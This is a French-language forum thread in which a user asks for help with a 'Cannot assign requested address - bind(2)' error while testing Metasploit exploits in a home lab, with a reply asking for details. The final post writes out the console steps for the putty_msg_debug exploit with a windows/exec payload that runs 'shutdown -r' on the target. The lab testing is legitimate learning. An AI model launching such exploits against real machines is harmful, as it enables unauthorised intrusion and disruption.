[akway]

bonjour a tous,

Je me suis depuis peu mis a tester le fameux framework metasploit sur ma ubuntu jaunty.
J'ai procédé a l'installation comme indiqué sur le site :
http://trac.metasploit.com/wiki/Metasploit3/InstallUbuntu

installation qui se passe d'ailleurs sans probleme.

sur une autre machine de mon reseau local (sous windows XP sp2) j'ai installé une suite de logiciel vulnérables afin de tester le fonctionnement desdits  exploits avec pour objectif de sniffer le reseau en meme temps, etudier un peu la tronche de la mémoire pendant l'exploit... bref une bon apres midi en perspective

pourtant lors du test de mon exploit ( j'en ai essayé pas mal) je me retrouve la plupart du temps avec l'erreur suivante :

Exploit failed: Cannot assign requested address - bind(2)

ps : j'ai bien assigné les options nécéssaires a l'exploit et a la payload selectionné mais keudall, j'hesite a dire sur le forum quelle application j'ai ciblé et les options que j'ai defini( SRVHOST, LHOST, LPORT...).

je tourne sur jaunty et mon systeme est a jour a l'heure de ce post sans aucune application tiers installée.

Quelqu'un aurait il déja testé le framework et rencontré ce probleme ? je post ici car il n'y a pas de forum sur metasploit, je n'ai pas non plus vu de FAQ ;'(

* me manquerai un paquet dont ruby aurait besoin que ca m' étonnerai pas*

merci par avance .

[s3th]

Es-tu sur que toutes les conditions sont réunies pour lancer l'exploit.
Genre t'as un exploit codé pour win xp service pack 2 eng et toi t'essaies de le lancer sur un vista francais.
Alors oui vas-y détailles le plus possible ta manoeuvre car on est pas devin.

[akway]

malheureusement je ne peut tester qu'au boulot, je devrai attendre lundi pour donner plus d'info :'(

de memoire j'ai testé le l'exploit ciblant putty 0.56 fonctionnant sur xp sp2 eng .comme payload en ai testé une dizaine dedifferentes visant a m' octroyer une invite de commande ( désolé pour le manque d'info le complément arrivera lundi).

tout ca pour dire que j'ai bien fait gaffe au system cible et a stipuler les parametres necessaires ( show options SRVHOST, LHOST, toussa toussa)

je penche donc pour une dependance manquante (voir tuto au dessus) puisque j'ai testé sur une backtrack 3 et sur cible similaire ca fonctionne ;'(

je te decrirais ma manip' lundi merci pour ton aide.

[akway]

Comme convenu le détail de la configuration de ma plateforme de tests :

Systeme cible : Windows 2000 sp4 ENG
                      network configuration 192.168.0.1
                     -Putty 0.53 (exploit windows/ssh/putty_msg_debug)


Systeme attaquant :   Ubuntu 9.04
                                network configuration 192.168.0.2
                             -metasploit Framework 3.02

packages additionnels :
# apt-get install ruby libruby rdoc
# apt-get install libyaml-ruby
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
# apt-get install libdl-ruby
# apt-get install libreadline-ruby
# apt-get install libiconv-ruby
# apt-get install rubygems

mise en application :
sur la cible:
connection SSH depuis 192.168.0.1 vers 192.168.0.2 en utilisant le client putty

sur le  poste utilisant metasploit :
msf > use windows/ssh/putty_msg_debug
msf exploit(putty_msg_debug) > set SRVHOST 192.168.0.1
msf exploit(putty_msg_debug) > set payload  windows/exec
msf exploit(putty_msg_debug) > set CMD shutdown -r
msf exploit(putty_msg_debug) > exploit

• Exploit running as background job.

msf exploit(putty_msg_debug) >
[-] Exploit failed: Cannot assign requested address - bind(2)

j' ai testé d'autre payloads mais le resultat reste le meme ...